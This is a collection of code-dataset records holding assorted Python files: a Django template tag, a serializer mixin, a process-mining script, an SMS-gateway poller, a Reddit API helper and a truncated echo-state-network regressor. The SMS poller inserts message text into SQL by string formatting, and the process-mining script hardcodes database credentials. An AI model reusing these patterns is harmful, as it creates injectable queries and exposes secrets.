"line_number": 78, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 79, "usage_type": "call"}, {"api_name": "cv2.moveWindow", "line_number": 80, "usage_type": "call"}, {"api_name": "cv2.createTrackbar", "line_number": 81, "usage_type": "call"}, {"api_name": "cv2.setMouseCallback", "line_number": 82, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 83, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 86, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 87, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 91, "usage_type": "attribute"}]} +{"seq_id": "26253551487", "text": "from datetime import datetime\n\n\nclass Serializer(object):\n \"\"\"Mixin for retrieving public fields of SQLAlchemy models\n in json-compatible format\"\"\"\n __public__ = None\n\n def get_dict(self, exclude=(), extra=()):\n \"Returns model's PUBLIC data for jsonify\"\n data = {}\n keys = self._sa_instance_state.attrs.items()\n public = self.__public__ + extra if self.__public__ else extra\n for k, field in keys:\n if public and k not in public: continue\n if k in exclude: continue\n value = self._serialize(field.value)\n if value:\n data[k] = value\n return data\n\n @classmethod\n def _serialize(cls, value, follow_fk=False):\n if isinstance(value, datetime):\n ret = value.isoformat()\n elif hasattr(value, '__iter__'):\n ret = [cls._serialize(v) for v in value]\n elif Serializer in value.__class__.__bases__:\n ret = value.get_public()\n else:\n ret = value\n return ret\n", "repo_name": "kirang89/youten", "sub_path": "api/helpers.py", "file_name": "helpers.py", "file_ext": "py", "file_size_in_byte": 1043, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "datetime.datetime", "line_number": 24, "usage_type": "argument"}]} +{"seq_id": "33619016279", "text": "# -*- coding: utf-8 -*-\nfrom django import template\nimport re\nimport django_settings\n\nregister = template.Library()\n\n\nclass ContextNode(template.base.TextNode):\n def __init__(self, s, var_name):\n super(ContextNode, self).__init__(s)\n self.var_name = var_name\n\n def render(self, context):\n if self.var_name:\n context[self.var_name] = self.s\n return ''\n return super(ContextNode, self).render(context)\n\n\n@register.tag\ndef settings(parser, token):\n var_name = None\n try:\n tag_name, arg = token.contents.split(None, 1)\n except ValueError:\n raise template.TemplateSyntaxError(\n \"%r tag requires arguments\" % token.contents.split()[0])\n m = re.search(r'(.*?) as (\\w+)', arg)\n if m:\n arg, var_name = m.groups()\n if not (arg[0] == arg[-1] and arg[0] in ('\"', \"'\")):\n raise template.TemplateSyntaxError(\n \"%r tag's argument should be in quotes\" % tag_name)\n return ContextNode(django_settings.get(arg[1:-1]), var_name)\n", "repo_name": "jqb/django-settings", "sub_path": "django_settings/templatetags/settings_tags.py", "file_name": "settings_tags.py", "file_ext": "py", "file_size_in_byte": 1037, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 83, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.template.Library", "line_number": 6, "usage_type": "call"}, {"api_name": "django.template", "line_number": 6, "usage_type": "name"}, {"api_name": "django.template.base", "line_number": 9, "usage_type": "attribute"}, {"api_name": "django.template", "line_number": 9, "usage_type": "name"}, {"api_name": "django.template.TemplateSyntaxError", "line_number": 27, "usage_type": "call"}, {"api_name": "django.template", "line_number": 27, "usage_type": "name"}, {"api_name": "re.search", "line_number": 29, "usage_type": "call"}, {"api_name": "django.template.TemplateSyntaxError", "line_number": 33, "usage_type": "call"}, {"api_name": "django.template", "line_number": 33, "usage_type": "name"}, {"api_name": "django_settings.get", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "3655117037", "text": "import psycopg2\nimport pandas as pd\nimport networkx as nx\nimport numpy as np\nimport collections\nimport matplotlib.pyplot as plt\n\ndef filter_event_log(event_log, z):\n \"\"\"\n Filter the first z events for cases in the log\n (and delete the events of cases with less than z events)\n :param event_log: a df containing the event log\n :param z: the number of events to filter\n :return: a df containing the filtered event log\n \"\"\"\n event_log = event_log\n rio = []\n grouped = event_log.groupby('caseid')\n for name, group in grouped:\n if len(group) >= z:\n rio.append(group.iloc[:z])\n df = pd.concat(rio)\n df = df.sort_values('ts', ascending=[True])\n df = df.reset_index(drop=True)\n print(df)\n return df\n\n pass\n\ndef get_social_network_handoffs(event_log, z, x):\n \"\"\"\n Returns a (networkx) graph containing the\n work handoff social network of an event log\n :param event_log: a df containing the event log\n :param z: the number of events to filter\n :param x: the threshold of handoffs to consider edges\n :return: a social network of handoffs graph\n \"\"\"\n event_log = filter_event_log(event_log, z)\n grouped = event_log.groupby(['caseid'])\n g1 = nx.DiGraph()\n for name, group in grouped:\n activity_list = list(group['activity'])\n resource_list = list(group['resource'])\n edge = []\n hand_off = 0\n compare = activity_list[0]\n compare2 = resource_list[0]\n for i in range(len(resource_list)):\n if compare == activity_list[i]:\n hand_off +=1\n else:\n if compare2 == resource_list[i]:\n hand_off = 0\n del compare\n del compare2\n compare = activity_list[i]\n compare2 = resource_list[i]\n else:\n for j in range(hand_off):\n edge.append((compare2, resource_list[i]))\n hand_off = 0\n del compare\n del compare2\n compare = activity_list[i]\n compare2 = resource_list[i]\n result = collections.Counter(edge)\n for i in range(len(list(result.keys()))):\n if list(result.values())[i] >= x:\n g1.add_nodes_from([list(result.keys())[i][0], list(result.keys())[i][1]])\n g1.add_edge(list(result.keys())[i][0], list(result.keys())[i][1], weight=list(result.values())[i])\n node = list(g1.nodes)\n rio = []\n for i in range(len(node)):\n for j in range(1,len(node)):\n if nx.has_path(g1, node[i], node[j]) == False:\n rio.append((node[i], node[j]))\n print(rio)\n return g1\n pass\n\ndef preprocess_event_log(event_log, z):\n \"\"\"\n Returns a dataframe containing the event log\n filtered and preprocessed to create items\n :param event_log: a df containing the event log\n :param z: the number of events to filter\n :return: a df containing the filtered and preprocessed log\n \"\"\"\n event_log = filter_event_log(event_log,z)\n groups = event_log.groupby('activity', as_index=True)\n rio = []\n count = 0\n for case, group in groups:\n print(\"processing ...{0}/{1}\".format(count, len(groups)))\n count +=1\n group = group.reset_index(drop=True)\n group2 = group.copy()\n for i in range(len(group)):\n if i == 0:\n group.loc[i, 'ts'] = 0\n else:\n group.loc[i, 'ts'] = (group2.loc[i, 'ts'] - group2.loc[i - 1, 'ts']).seconds\n mean = np.mean(list(group.loc[:,'ts']))\n mean1 = np.mean(list(group.loc[:, 'reqamount']))\n for i in range(len(group)):\n if group.loc[i, 'ts'] < 0.4 * mean:\n group.loc[i, 'ts'] = 'SHORT'\n elif group.loc[i, 'ts'] < 0.65 * mean:\n group.loc[i, 'ts'] = 'MEDIUM'\n else:\n group.loc[i, 'ts'] = 'LONG'\n if group.loc[i, 'reqamount'] < 0.4*mean1:\n group.loc[i, 'reqamount'] = 'SMALL'\n elif group.loc[i, 'reqamount'] < 1.2*mean1:\n group.loc[i, 'reqamount'] = 'MEDIUM'\n else:\n group.loc[i, 'reqamount'] = 'LARGE'\n rio.append(group)\n\n\n new_log = pd.concat(rio)\n new_log = new_log.sort_values('id', ascending=[True])\n new_log = new_log[['caseid', 'apptype', 'activity', 'resource', 'reqamount', 'ts']].reset_index(drop=True)\n new_log = pd.get_dummies(new_log, columns = ['apptype', 'activity', 'resource', 'reqamount', 'ts'])\n grouped = new_log.groupby('caseid')\n rio = []\n for name, group in grouped:\n group = group.reset_index(drop=True)\n new_data = pd.DataFrame()\n for i in range(z):\n if i == 0:\n dict_1 = group.iloc[0].to_dict()\n new_data = pd.DataFrame.from_dict([dict_1])\n else:\n dict_1 = group.iloc[i].to_dict()\n new_data2 = pd.DataFrame.from_dict([dict_1])\n new_data = pd.merge(new_data, new_data2, on='caseid', suffixes=('_{0}'.format(i),'_{0}'.format(i+1)))\n rio.append(new_data)\n df = pd.concat(rio)\n df = df.reset_index(drop=True)\n print(df.head(10))\n return df\n\n pass\n\ndef get_item(event_log, z, case_id, attr_name, attr_value, event_pos):\n \"\"\"\n returns the item list associated with case_id\n :param event_log: a df containing the event log\n :param z: the number of events to filter\n :param case_id: the id of the case to consider\n :param attr_name: name of the attribute (e.g. \"resource\")\n :param attr_value: the value of the attribute (e.g. \"user_34\")\n :param event_pos: the position in the case of the event (events always ordered by timestamp, from earlier to later), NOT RELEVANT FOR CASE-lEVEL ATTRIBUTES\n :return: a list of items for case case_id\n \"\"\"\n\n event_log = preprocess_event_log(event_log,z)\n if '{0}_{1}_{2}'.format(attr_name, attr_value, event_pos) not in event_log.columns:\n print('There is no {0}_{1}'.format(attr_value, event_pos))\n else:\n index = 0\n for i in range(len(event_log)):\n case_id1 = event_log.loc[i, 'caseid']\n if case_id1 == case_id:\n index = i\n value = event_log.loc[index, '{0}_{1}_{2}'.format(attr_name, attr_value, event_pos)]\n print('result : {0}'.format(value))\n pass\ndef display_and_save(G, file_name, layout = \"fg\"):\n \"\"\"\n This function is given and allows you to (i) display a graph using matplotlib and (ii) save the graph\n is a png file named \"file_name\"\n :param G: the graph\n :param file_name: the name of the file, e.g. \"graph\" will save the image in a file named \"graph.png\"\n :param layout: the layout chosen to visualise the graph (default is fruchterman_reingold_layout)\n \"\"\"\n\n if layout == \"spring\":\n pos = nx.spring_layout(G)\n elif layout == \"shell\":\n pos = nx.shell_layout(G)\n elif layout == \"spectral\":\n pos = nx.spectral_layout(G)\n else:\n pos = nx.fruchterman_reingold_layout(G)\n\n # nodes\n nx.draw_networkx_nodes(G, pos,\n nodelist=G.nodes(),\n node_color='r',\n node_size=500,\n alpha=0.8)\n\n nx.draw_networkx_edges(G, pos,\n edgelist=G.edges(),\n width=2, alpha=0.5, edge_color='r')\n\n labels = {}\n i = 0\n for node in G.nodes():\n labels[node] = str(node)\n\n nx.draw_networkx_labels(G, pos, labels, font_size=16)\n\n plt.axis('off')\n plt.savefig(file_name + \".png\") # save as png\n plt.show() # display\n\nif __name__ == '__main__':\n connection = psycopg2.connect(user=\"myuser064\",\n password=\"064\",\n host=\"114.70.14.56\",\n port=\"10051\",\n database=\"mydb\")\n print(\"---Connecting to database...\")\n cursor = connection.cursor()\n print(\"---done.\\n\")\n\n print(\"Running query 1...\\n\")\n query1 = \"select * from {0}\".format('loans')\n query1_output = query1\n cursor.execute(query1_output, ('loans', id))\n records1 = cursor.fetchall()\n\n col_names = []\n for desc in cursor.description:\n col_names.append(desc[0])\n cursor.close()\n\n event_log = pd.DataFrame.from_records(list(records1), columns=col_names)\n preprocess_event_log(event_log,13)\n graph = get_social_network_handoffs(event_log,13,3)\n display_and_save(graph, 'ko.png')\n\n pass", "repo_name": "KyuHwan00/Data_Science_Programming-2", "sub_path": "Solution.py", "file_name": "Solution.py", "file_ext": "py", "file_size_in_byte": 8685, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.concat", "line_number": 22, "usage_type": "call"}, {"api_name": "networkx.DiGraph", "line_number": 41, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 67, "usage_type": "call"}, {"api_name": "networkx.has_path", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 105, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 122, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 125, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 130, "usage_type": "call"}, {"api_name": "pandas.DataFrame.from_dict", "line_number": 134, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 134, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame.from_dict", "line_number": 137, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 137, "usage_type": "attribute"}, {"api_name": "pandas.merge", "line_number": 138, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 140, "usage_type": "call"}, {"api_name": "networkx.spring_layout", "line_number": 181, "usage_type": "call"}, {"api_name": "networkx.shell_layout", "line_number": 183, "usage_type": "call"}, {"api_name": "networkx.spectral_layout", "line_number": 185, "usage_type": "call"}, {"api_name": "networkx.fruchterman_reingold_layout", "line_number": 187, "usage_type": "call"}, {"api_name": "networkx.draw_networkx_nodes", "line_number": 190, "usage_type": "call"}, {"api_name": "networkx.draw_networkx_edges", "line_number": 196, "usage_type": "call"}, {"api_name": "networkx.draw_networkx_labels", "line_number": 205, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 207, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 207, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 208, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 208, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 209, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 209, "usage_type": "name"}, {"api_name": "psycopg2.connect", "line_number": 212, "usage_type": "call"}, {"api_name": "pandas.DataFrame.from_records", "line_number": 232, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 232, "usage_type": "attribute"}]} +{"seq_id": "22146163654", "text": "import requests,pymysql,time\n\n# Connect to the database\nconnection = pymysql.connect(host='localhost',\n user='root',\n password='',\n db='sms_gateway',\n cursorclass=pymysql.cursors.DictCursor)\ncursor =connection.cursor()\n\n# url\n# url=\"http://192.168.43.1:8080/v1/sms\"\n\ndef checkApi(device):\n print(\"cek device %s..\" % device['id'])\n url=\"http://\"+device['ip_address']+\"/v1/sms\"\n # print(type(url))\n r = requests.get(url)\n response = r.json()\n # print(response)\n sql=\"SELECT max(id_message) as max FROM inbox where received_by=%s\"%device['id']\n # # print(url)\n cursor.execute(sql)\n # # return\n id = cursor.fetchone()\n # #\n # # # print(type(id['max']))\n # # # max=None\n if id['max'] is None :\n max=0\n else:\n max=id['max']\n # # print(type(max))\n #\n # # get result and filter max id\n result = response['messages']\n filter = [item for item in result if int(item['_id']) > max and item['msg_box']=='inbox']\n if filter:\n for message in filter:\n alert=''\n if (message['msg_box']=='inbox'):\n alert = \"Pesan Masuk dari %s\" % message['address']\n elif (message['msg_box']=='outbox'):\n alert = \"Pesan Terkirim ke %s\" % message['address']\n print(alert)\n\n # print(message)\n\n sql = 'INSERT INTO inbox values(null,\"%s\",\"%s\",\"%s\",\"%s\")' % (\n message['_id'], device['id'],message['address'], message['body'])\n\n # print(sql)\n cursor.execute(sql)\n connection.commit()\n connection.rollback()\n else:\n print(\"tidak ada pesan masuk di %s\"%device['id'])\ndef selectDevice():\n sql=\"select * from device\"\n cursor.execute(sql)\n devices=cursor.fetchall()\n # print(device)\n for device in devices:\n checkApi(device)\n connection.rollback()\nwhile 1:\n selectDevice()\n # checkApi()\n time.sleep(3)", "repo_name": "uripyogantara/sms-gateway", "sub_path": "messages.py", "file_name": "messages.py", "file_ext": "py", "file_size_in_byte": 2051, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pymysql.connect", "line_number": 4, "usage_type": "call"}, {"api_name": "pymysql.cursors", "line_number": 8, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 18, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 69, "usage_type": "call"}]} +{"seq_id": "35540047622", "text": "#!/usr/bin/python3\n\"\"\"\nqueries the number of subscribers in a subreddit\n\"\"\"\nimport requests\n\n\ndef number_of_subscribers(subreddit):\n \"\"\"\n gets the number of subscribers in the subreddit given as an arg\n \"\"\"\n url = 'https://www.reddit.com/r/{}/about.json'.format(subreddit)\n headers = {'User-Agent': 'api-test by Namasaka'}\n res = requests.get(url, headers=headers, allow_redirects=False)\n\n # parse if request is successful\n if res.status_code == 200:\n res = res.json()\n return (res['data']['subscribers'])\n return 0\n", "repo_name": "NamasakaLennox/alx-system_engineering-devops", "sub_path": "0x16-api_advanced/0-subs.py", "file_name": "0-subs.py", "file_ext": "py", "file_size_in_byte": 557, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "44049346145", "text": "\"\"\"The :mod:`echo_state_network` contains an ESNRegressor and ESNClassifier.\"\"\"\n\n# Authors: Peter Steiner \n# License: BSD 3 clause\n\nfrom __future__ import annotations\nimport sys\nimport numpy as np\nfrom sklearn.base import (BaseEstimator, ClassifierMixin, RegressorMixin,\n MultiOutputMixin, is_regressor, clone)\nfrom sklearn.linear_model._base import LinearModel\n\nfrom ..base.blocks import InputToNode, NodeToNode\nfrom ..util import concatenate_sequences\nfrom ..linear_model import IncrementalRegression\nfrom ..projection import MatrixToValueProjection\nfrom sklearn.utils.validation import _deprecate_positional_args\nfrom sklearn.preprocessing import LabelBinarizer\nfrom sklearn.exceptions import NotFittedError\n\nfrom joblib import Parallel, delayed\n\nif sys.version_info >= (3, 8):\n from typing import Union, Dict, Any, Optional, Literal\nelse:\n from typing_extensions import Literal\n from typing import Union, Dict, Any, Optional\n\n\nclass ESNRegressor(BaseEstimator, MultiOutputMixin, RegressorMixin):\n \"\"\"\n Echo State Network regressor.\n\n This model optimizes the mean squared error loss function\n using linear regression.\n\n Parameters\n ----------\n input_to_node : Optional[InputToNode], default=None\n Any ```InputToNode``` object that transforms the inputs.\n If ```None```, a ```pyrcn.base.blocks.InputToNode```\n object is instantiated.\n node_to_node : Optional[NodeToNode], default=None\n Any ```NodeToNode``` object that transforms the outputs of\n ```input_to_node```.\n If ```None```, a ```pyrcn.base.blocks.NodeToNode```\n object is instantiated.\n regressor : Union[IncrementalRegression, LinearModel, None], default=None\n Regressor object such as derived from ``BaseEstimator``. This\n regressor will automatically be cloned each time prior to fitting.\n If ```None```, a ```pyrcn.linear_model.IncrementalRegression```\n object is instantiated.\n requires_sequence : Union[Literal[\"auto\"], bool], default=\"auto\"\n If True, the input data is expected to be a sequence.\n If \"auto\", tries to automatically estimate when calling ```fit```\n for the first time\n decision_strategy : Literal[\"winner_takes_all\", \"median\", \"last_value\"],\n default='winner_takes_all'\n Decision strategy for sequence-to-label task. Ignored if the\n target output is a sequence\n verbose : bool = False\n Verbosity output\n kwargs : Any\n keyword arguments passed to the subestimators if this is desired,\n default=None\n \"\"\"\n\n @_deprecate_positional_args\n def __init__(self, *,\n input_to_node: Optional[InputToNode] = None,\n node_to_node: Optional[NodeToNode] = None,\n regressor: Union[IncrementalRegression,\n LinearModel, None] = None,\n requires_sequence: Union[Literal[\"auto\"], bool] = \"auto\",\n decision_strategy: Literal[\"winner_takes_all\", \"median\",\n \"last_value\"] = \"winner_takes_all\",\n verbose: bool = True,\n **kwargs: Any) -> None:\n \"\"\"Construct the ESNRegressor.\"\"\"\n if input_to_node is None:\n i2n_params = InputToNode()._get_param_names()\n self.input_to_node = InputToNode(\n **{key: kwargs[key] for key in kwargs.keys()\n if key in i2n_params})\n else:\n i2n_params = input_to_node._get_param_names()\n self.input_to_node = input_to_node.set_params(\n **{key: kwargs[key] for key in kwargs.keys()\n if key in i2n_params})\n if node_to_node is None:\n n2n_params = NodeToNode()._get_param_names()\n self.node_to_node = NodeToNode(\n **{key: kwargs[key] for key in kwargs.keys()\n if key in n2n_params})\n else:\n n2n_params = node_to_node._get_param_names()\n self.node_to_node = node_to_node.set_params(\n **{key: kwargs[key] for key in kwargs.keys()\n if key in n2n_params})\n if regressor is None:\n reg_params = IncrementalRegression()._get_param_names()\n self.regressor = IncrementalRegression(\n **{key: kwargs[key] for key in kwargs.keys()\n if key in reg_params})\n else:\n reg_params = regressor._get_param_names()\n self.regressor = regressor.set_params(\n **{key: kwargs[key] for key in kwargs.keys()\n if key in reg_params})\n self._regressor = self.regressor\n self._requires_sequence = requires_sequence\n self.verbose = verbose\n self.decision_strategy = decision_strategy\n\n def __add__(self, other: ESNRegressor) -> ESNRegressor:\n \"\"\"\n Sum up two instances of an ```ESNRegressor```.\n\n We always need to update the correlation matrices of the regressor.\n\n Parameters\n ----------\n other : ESNRegressor\n ```ESNRegressor``` to be added to ```self```\n\n Returns\n -------\n self : returns the sum of two ```ESNRegressor``` instances.\n \"\"\"\n self.regressor._K = self.regressor._K + other.regressor._K\n self.regressor._xTy = self.regressor._xTy + other.regressor._xTy\n return self\n\n def __radd__(self, other: ESNRegressor) -> ESNRegressor:\n \"\"\"\n Sum up multiple instances of an ```ESNRegressor```.\n\n We always need to update the correlation matrices of the regressor.\n\n Parameters\n ----------\n other : ESNRegressor\n ```ESNRegressor``` to be added to ```self```\n\n Returns\n -------\n self : returns the sum of two ```ESNRegressor``` instances.\n \"\"\"\n if other == 0:\n return self\n else:\n return self.__add__(other)\n\n def get_params(self, deep: bool = True) -> Dict:\n \"\"\"Get all parameters of the ESNRegressor.\"\"\"\n if deep:\n return {**self.input_to_node.get_params(),\n **self.node_to_node.get_params(),\n **{\"alpha\": self.regressor.get_params()[\"alpha\"]}}\n else:\n return {\"input_to_node\": self.input_to_node,\n \"node_to_node\": self.node_to_node,\n \"regressor\": self.regressor,\n \"requires_sequence\": self._requires_sequence}\n\n def set_params(self, **parameters: dict) -> ESNRegressor:\n \"\"\"Set all possible parameters of the ESNRegressor.\"\"\"\n i2n_params = self.input_to_node._get_param_names()\n self.input_to_node = self.input_to_node.set_params(\n **{key: parameters[key] for key in parameters.keys()\n if key in i2n_params})\n n2n_params = self.node_to_node._get_param_names()\n self.node_to_node = self.node_to_node.set_params(\n **{key: parameters[key] for key in parameters.keys()\n if key in n2n_params})\n reg_params = self.regressor._get_param_names()\n self.regressor = self.regressor.set_params(\n **{key: parameters[key] for key in parameters.keys()\n if key in reg_params})\n for parameter, value in parameters.items():\n if parameter in self.get_params(deep=False):\n setattr(self, parameter, value)\n\n return self\n\n def _check_if_sequence(self, X: np.ndarray, y: np.ndarray) -> None:\n \"\"\"\n Validation of the training data.\n\n If X is a list and each member of the list has the same number of\n samples, we treat it as an array of instance (one sequence).\n\n If X or y have more than two dimensions, it is no valid data type.\n\n If the number of dimensions of X after converting it to a\n ```ndarray``` is one, the ESN runs in sequential mode.\n\n Parameters\n ----------\n X : np.ndarray\n The input data\n y : np.ndarray\n The target data\n \"\"\"\n if X.ndim > 2 or y.ndim > 2:\n raise ValueError(\"Could not determine a valid structure,\"\n \"because X has {0} and y has {1} dimensions.\"\n \"Only 1 or 2 dimensions allowed.\"\n .format(X.ndim, y.ndim))\n self.requires_sequence = X.ndim == 1\n\n def _check_if_sequence_to_value(self,\n X: np.ndarray, y: np.ndarray) -> None:\n \"\"\"\n Validation of the training data.\n\n If the numbers of samples in each element of (X, y) in sequential form\n are different, we assume to have a sequence-to-value problem,\n such as a seqence-to-label classification.\n\n Parameters\n ----------\n X : np.ndarray\n The input data\n y : np.ndarray\n The target data\n \"\"\"\n len_X = np.unique([x.shape[0] for x in X])\n len_y = np.unique([yt.shape[0] for yt in y])\n self._sequence_to_value = not np.any(len_X == len_y)\n\n def partial_fit(self, X: np.ndarray, y: np.ndarray,\n transformer_weights: Union[None, np.ndarray] = None,\n postpone_inverse: bool = False) -> ESNRegressor:\n \"\"\"\n Fit the regressor partially.\n\n Parameters\n ----------\n X : ndarray of shape (n_samples, n_features)\n y : ndarray of shape (n_samples,) or (n_samples, n_targets)\n The targets to predict.\n transformer_weights : ignored\n postpone_inverse : bool, default=False\n If the output weights have not been fitted yet, regressor might be\n hinted at postponing inverse calculation. Refer to\n ```IncrementalRegression```\n for details.\n\n Returns\n -------\n self : Returns a trained ```ESNRegressor``` model.\n \"\"\"\n self._validate_hyperparameters()\n self._validate_data(X=X, y=y, multi_output=True)\n\n # input_to_node\n try:\n hidden_layer_state = self._input_to_node.transform(X)\n except NotFittedError as e:\n if self.verbose:\n print('input_to_node has not been fitted yet: {0}'.format(e))\n hidden_layer_state = self._input_to_node.fit_transform(X)\n pass\n\n # node_to_node\n try:\n hidden_layer_state = self._node_to_node.transform(\n hidden_layer_state)\n except NotFittedError as e:\n if self.verbose:\n print('node_to_node has not been fitted yet: {0}'.format(e))\n hidden_layer_state = self._node_to_node.fit_transform(\n hidden_layer_state)\n pass\n\n # regression\n if not hasattr(self._regressor, 'partial_fit') and postpone_inverse:\n raise BaseException('Regressor has no attribute partial_fit, got'\n '{0}'.format(self._regressor))\n elif not hasattr(self._regressor, 'partial_fit') \\\n and not postpone_inverse:\n self._regressor.fit(hidden_layer_state, y)\n elif hasattr(self._regressor, 'partial_fit'):\n self._regressor.partial_fit(\n hidden_layer_state, y, postpone_inverse=postpone_inverse)\n return self\n\n def fit(self, X: np.ndarray, y: np.ndarray,\n n_jobs: Union[int, np.integer, None] = None,\n transformer_weights: Optional[np.ndarray] = None) -> ESNRegressor:\n \"\"\"\n Fit the regressor.\n\n Parameters\n ----------\n X : ndarray of shape (n_samples, n_features) or of shape (n_sequences,)\n y : ndarray of shape (n_samples,) or (n_samples, n_targets)\n or of shape (n_sequences)\n The targets to predict.\n n_jobs : Optional[int, np.integer], default=None\n The number of jobs to run in parallel. ```-1``` means using all\n processors.\n See :term:`Glossary ` for more details.\n transformer_weights : Optional[np.ndarray] = None\n ignored\n\n Returns\n -------\n self : Returns a trained ESNRegressor model.\n \"\"\"\n self._validate_hyperparameters()\n if self.requires_sequence == \"auto\":\n self._check_if_sequence(X, y)\n if self.requires_sequence:\n self._input_to_node.fit(X[0])\n self._node_to_node.fit(self._input_to_node.transform(X[0]))\n X, y, sequence_ranges = concatenate_sequences(X, y)\n else:\n self._validate_data(X, y, multi_output=True)\n self._input_to_node.fit(X)\n self._node_to_node.fit(self._input_to_node.transform(X))\n # self._regressor = self._regressor.__class__()\n if self.requires_sequence:\n return self._sequence_fit(X, y, sequence_ranges, n_jobs)\n else:\n return self.partial_fit(X, y, postpone_inverse=False)\n\n def _sequence_fit(self, X: np.ndarray, y: np.ndarray,\n sequence_ranges: np.ndarray,\n n_jobs: Union[int, np.integer,\n None] = None) -> ESNRegressor:\n \"\"\"\n Call partial_fit for each sequence. Runs parallel if more than one job.\n\n Parameters\n ----------\n X : ndarray of shape (samples, n_features)\n y : ndarray of shape (n_samples,) or (n_samples, n_targets)\n The targets to predict.\n sequence_ranges : ndarray of shape (n_sequences, 2)\n The start and stop indices of each sequence are denoted here.\n n_jobs : Union[int, np.integer, None], default=None\n The number of jobs to run in parallel. ```-1``` means using all\n processors.\n See :term:`Glossary ` for more details.\n\n Returns\n -------\n self : Returns a trained ESNRegressor model.\n \"\"\"\n if n_jobs is not None and n_jobs > 1:\n reg = Parallel(n_jobs=n_jobs)(delayed(ESNRegressor.partial_fit)\n (clone(self), X[idx[0]:idx[1], ...],\n y[idx[0]:idx[1], ...],\n postpone_inverse=True)\n for idx in sequence_ranges[:-1])\n reg = sum(reg)\n self._regressor = reg._regressor\n else:\n [ESNRegressor.partial_fit(self,\n X[idx[0]:idx[1], ...],\n y[idx[0]:idx[1], ...],\n postpone_inverse=True)\n for idx in sequence_ranges[:-1]]\n\n # last sequence, calculate inverse and bias\n ESNRegressor.partial_fit(self, X=X[sequence_ranges[-1][0]:, ...],\n y=y[sequence_ranges[-1][0]:, ...],\n postpone_inverse=False)\n return self\n\n def predict(self, X: np.ndarray) -> np.ndarray:\n \"\"\"\n Predict the targets using the trained ```ESNRegressor```.\n\n Parameters\n ----------\n X : ndarray of shape (n_samples, n_features)\n\n Returns\n -------\n y : ndarray of (n_samples,) or (n_samples, n_targets)\n The predicted targets\n \"\"\"\n if self._input_to_node is None or self._regressor is None:\n raise NotFittedError(self)\n\n if self.requires_sequence is False:\n # input_to_node\n hidden_layer_state = self._input_to_node.transform(X)\n hidden_layer_state = self._node_to_node.transform(\n hidden_layer_state)\n # regression\n return self._regressor.predict(hidden_layer_state)\n else:\n y = np.empty(shape=X.shape, dtype=object)\n for k, seq in enumerate(X):\n # input_to_node\n hidden_layer_state = self._input_to_node.transform(seq)\n hidden_layer_state = self._node_to_node.transform(\n hidden_layer_state)\n # regression\n y[k] = self._regressor.predict(hidden_layer_state)\n return y\n\n def _validate_hyperparameters(self) -> None:\n \"\"\"Validate the hyperparameters.\"\"\"\n if not (hasattr(self.input_to_node, \"fit\")\n and hasattr(self.input_to_node, \"fit_transform\")\n and hasattr(self.input_to_node, \"transform\")):\n raise TypeError(\"All input_to_node should be transformers and\"\n \"implement fit and transform '{0}' (type {1}) \"\n \"doesn't\".format(self.input_to_node,\n type(self.input_to_node)))\n\n if not (hasattr(self.node_to_node, \"fit\")\n and hasattr(self.node_to_node, \"fit_transform\")\n and hasattr(self.node_to_node, \"transform\")):\n raise TypeError(\"All node_to_node should be transformers and\"\n \"implement fit and transform '{0}' (type {1}) \"\n \"doesn't\".format(self.node_to_node,\n type(self.node_to_node)))\n\n if (self._requires_sequence != \"auto\"\n and not isinstance(self._requires_sequence, bool)):\n raise ValueError('Invalid value for requires_sequence, got {0}'\n .format(self._requires_sequence))\n\n if not is_regressor(self._regressor):\n raise TypeError(\"The last step should be a regressor and \"\n \"implement fit and predict '{0}' (type {1})\"\n \"doesn't\".format(self._regressor,\n type(self._regressor)))\n\n def __sizeof__(self) -> int:\n \"\"\"\n Return the size of the object in bytes.\n\n Returns\n -------\n size : int\n Object memory in bytes.\n \"\"\"\n return object.__sizeof__(self) + sys.getsizeof(self._input_to_node) + \\\n sys.getsizeof(self._node_to_node) + sys.getsizeof(self._regressor)\n\n @property\n def regressor(self) -> Union[LinearModel, IncrementalRegression]:\n \"\"\"\n Return the regressor.\n\n Returns\n -------\n regressor : LinearModel\n \"\"\"\n return self._regressor\n\n @regressor.setter\n def regressor(self, regressor: Union[LinearModel,\n IncrementalRegression]) -> None:\n \"\"\"\n Set the regressor.\n\n Parameters\n ----------\n regressor : LinearModel\n \"\"\"\n self._regressor = regressor\n\n @property\n def input_to_node(self) -> InputToNode:\n \"\"\"\n Return the input_to_node Transformer.\n\n Returns\n -------\n input_to_node : InputToNode\n \"\"\"\n return 